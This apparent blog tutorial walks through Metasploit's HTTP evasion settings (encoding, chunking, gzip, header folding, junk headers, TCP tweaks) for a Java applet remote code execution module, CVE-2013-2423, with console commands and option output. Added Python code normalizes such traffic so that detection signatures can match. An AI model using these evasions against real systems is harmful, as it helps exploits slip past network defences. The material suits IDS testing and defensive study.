Friday, April 17, 2015

HTTP Evasions using Metasploit Framework

This post walks through the HTTP evasion options of the Metasploit module java_jre17_reflection_types. Below are the details of the HTTP exploit module which we will be using for our tests.
msf > info exploit/multi/browser/java_jre17_reflection_types
       Name: Java Applet Reflection Type Confusion Remote Code Execution
     Module: exploit/multi/browser/java_jre17_reflection_types
   Platform: Java, Linux, OSX, Windows
CVE: 2013-2423 (http://cvedetails.com/cve/2013-2423/)

Execute the command below to start using the exploit module.
msf > use exploit/multi/browser/java_jre17_reflection_types                                                          
msf exploit(java_jre17_reflection_types) >

Execute the show options command to see which parameters need to be set before launching the attack.
We need to set options such as the destination IP/port, local IP/port and payload.

The following evasions are supported by Metasploit.
msf exploit(java_jre17_reflection_types) > show evasion                                                              
Module evasion options:
   Name           : HTML::base64
   Current Setting: none
   Description    : Enable HTML obfuscation via an embeded base64 html object (IE 
      not supported) (accepted: none, plain, single_pad, double_pad, 
      random_space_injection)

   Name           : HTML::javascript::escape
   Current Setting: 0
   Description    : Enable HTML obfuscation via HTML escaping (number of iterations)

   Name           : HTML::unicode
   Current Setting: none
   Description    : Enable HTTP obfuscation via unicode (accepted: none, utf-16le, 
      utf-16be, utf-16be-marker, utf-32le, utf-32be)

   Name           : HTTP::chunked
   Current Setting: false
   Description    : Enable chunking of HTTP responses via "Transfer-Encoding: 
      chunked"

   Name           : HTTP::compression
   Current Setting: none
   Description    : Enable compression of HTTP responses via content encoding 
      (accepted: none, gzip, deflate)

   Name           : HTTP::header_folding
   Current Setting: false
   Description    : Enable folding of HTTP headers

   Name           : HTTP::junk_headers
   Current Setting: false
   Description    : Enable insertion of random junk HTTP headers

   Name           : HTTP::server_name
   Current Setting: Apache
   Description    : Configures the Server header of all outgoing replies

   Name           : TCP::max_send_size
   Current Setting: 0
   Description    : Maximum tcp segment size.  (0 = disable)

   Name           : TCP::send_delay
   Current Setting: 0
   Description    : Delays inserted before every send.  (0 = disable)
msf exploit(java_jre17_reflection_types) >

To select an evasion, execute a command of the form
msf exploit(java_jre17_reflection_types) > set evasion_name parameter
e.g.
msf exploit(java_jre17_reflection_types) > set HTTP::compression gzip


base64
Encodes the HTML page with base64; the payload is not delivered in this case.
Base64 is a binary-to-text encoding scheme that represents binary data in an ASCII string format by translating it into a radix-64 representation.


http://www.hcidata.info/base64.htm

javascript escape (iteration 1)
Inserts an unescape() call into the HTML page.
The escape() function encodes a string for portability so that it can be transmitted across networks and computers. The unescape() function decodes an encoded string.

String Encoding: document.write(escape("Escape Function!"));
Output of Above Code: Escape%20Function%21

String Decoding: document.write(unescape("Escape%20Function%21"));
Output of Above Code: Escape Function!



unicode (utf16-be)
Unicode provides a unique number for every character, no matter what the platform, no matter what the program, no matter what the language.

For more information on Unicode, see:
http://unicode.org/standard/WhatIsUnicode.html
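
An added example (not from the original post or from Metasploit) of how an inspection engine can undo the unicode and javascript escape layers described above before matching a signature. The sample response, the "<applet" signature and the MAX_LAYERS cap are constructed assumptions.

```python
import re

_ESC = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")
_CALL = re.compile(r"""unescape\(\s*(["'])(.*?)\1\s*\)""", re.S)
_BOMS = ((b"\xff\xfe\x00\x00", "utf-32-le"), (b"\x00\x00\xfe\xff", "utf-32-be"),
         (b"\xff\xfe", "utf-16-le"), (b"\xfe\xff", "utf-16-be"))
MAX_LAYERS = 10  # assumed cap so hostile input cannot force unbounded work

def js_unescape(s: str) -> str:
    """Python equivalent of JavaScript unescape(): decodes %XX and %uXXXX only."""
    return _ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)

def decode_body(raw: bytes, charset: str = "") -> str:
    """Decode a response body: a BOM wins, else the declared charset, else latin-1."""
    for bom, enc in _BOMS:
        if raw.startswith(bom):
            return raw[len(bom):].decode(enc, "replace")
    return raw.decode(charset or "latin-1", "replace")

def peel(html: str) -> list:
    """Return [original, layer1, ...], decoding one unescape("...") literal per layer."""
    layers = [html]
    while len(layers) <= MAX_LAYERS:
        m = _CALL.search(layers[-1])
        if not m:
            break
        layers.append(js_unescape(m.group(2)))
    return layers

def build_escaped_sample(iterations: int = 2) -> bytes:
    """Constructed sample: a page wrapped in escape layers and sent as UTF-16BE."""
    html = "<html><applet archive='sample.jar'></applet></html>"
    for _ in range(iterations):
        escaped = "".join("%%%02x" % ord(c) for c in html)
        html = '<script>document.write(unescape("%s"))</script>' % escaped
    return html.encode("utf-16-be")

def matches(raw: bytes, charset: str, signature: str = "<applet") -> bool:
    """True if the signature appears in any decoded layer of the body."""
    return any(signature in layer for layer in peel(decode_body(raw, charset)))
```

A signature applied to the raw bytes, or to the text decoded with the wrong charset, never sees the tag; it only appears once every layer has been peeled.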

chunked
Instead of a "Content-Length" header, the HTTP response will have a "Transfer-Encoding" header, and the data is sent in chunks, with the size of each chunk given at the start of that chunk.



compression (gzip)
The process of reducing data size is known as “data compression”. GZIP performs best on text-based data such as CSS, JavaScript and HTML, and most browsers support GZIP compression. For GZIP compression intricacies, refer to this YouTube link.



Header Folding
Inserts whitespace characters such as space (\x20) or horizontal tab (\x09) between headers.
From RFC 2616:
        HTTP/1.1 header field values can be folded onto multiple lines if the continuation
        line begins with a space or horizontal tab. All linear white space, including folding,
        has the same semantics as SP. A recipient MAY replace any linear white space
        with a single SP before interpreting the field value or forwarding the message
        downstream.


Junk Headers
Insert invalid headers into the HTTP response.
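
An added example (not code from the original post or from Metasploit) of the normalization an inspection device has to perform to see the same body the browser does when chunking, compression, header folding and junk headers are combined. The sample response, the X-Qz7 junk header and the "<applet" signature are constructed for illustration.

```python
import gzip
import zlib

def unfold_headers(head: bytes) -> dict:
    """Parse a header block, joining folded (SP/HT-prefixed) continuation lines."""
    headers, last = {}, None
    for line in head.split(b"\r\n")[1:]:             # [0] is the status line
        if line[:1] in (b" ", b"\t") and last:       # RFC 2616 continuation line
            headers[last] = (headers[last] + b" " + line.strip()).strip()
        elif b":" in line:
            name, value = line.split(b":", 1)
            last = name.strip().lower()
            headers[last] = value.strip()
    return headers

def dechunk(body: bytes) -> bytes:
    """Reassemble a Transfer-Encoding: chunked body (hex size line, data, CRLF)."""
    out, pos = b"", 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";")[0], 16)  # drop any chunk extension
        if size == 0:
            return out
        out += body[eol + 2:eol + 2 + size]
        pos = eol + 2 + size + 2                      # skip the CRLF after the data

def normalize(response: bytes) -> bytes:
    """Return the body as the browser sees it, ready for signature matching."""
    head, _, body = response.partition(b"\r\n\r\n")
    hdr = unfold_headers(head)                        # junk headers are parsed, then unused
    if b"chunked" in hdr.get(b"transfer-encoding", b"").lower():
        body = dechunk(body)
    if hdr.get(b"content-encoding", b"").lower() in (b"gzip", b"deflate"):
        # wbits 32+15 auto-detects a gzip or zlib header (raw deflate needs -15)
        body = zlib.decompress(body, zlib.MAX_WBITS | 32)
    return body

HTML = b"<html><body><applet archive='sample.jar' code='Sample.class'></applet></body></html>"

def build_sample() -> bytes:
    """Constructed response: junk header, folded headers, gzip body sent in two chunks."""
    gz = gzip.compress(HTML)
    chunks = b"".join(b"%x\r\n%s\r\n" % (len(c), c) for c in (gz[:10], gz[10:]))
    head = (b"HTTP/1.1 200 OK\r\nX-Qz7: k2\r\nContent-Encoding:\r\n\tgzip\r\n"
            b"Transfer-Encoding:\r\n chunked")
    return head + b"\r\n\r\n" + chunks + b"0\r\n\r\n"
```

A parser that reads headers one line at a time misses both folded headers in the sample and would treat the body as plain, unchunked data, which is why the unfolding step has to come first.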



TCP max_send_size
Metasploit doesn't send packets with a segment size of 8 bytes when max_send_size is set to 8. In the normal attack scenario we were sending 30 to 40 packets, but with this evasion type we send 80 packets.

TCP send_delay
TCP delay: we are not sure whether the value passed is in microseconds or seconds; we don't see any delay between packets.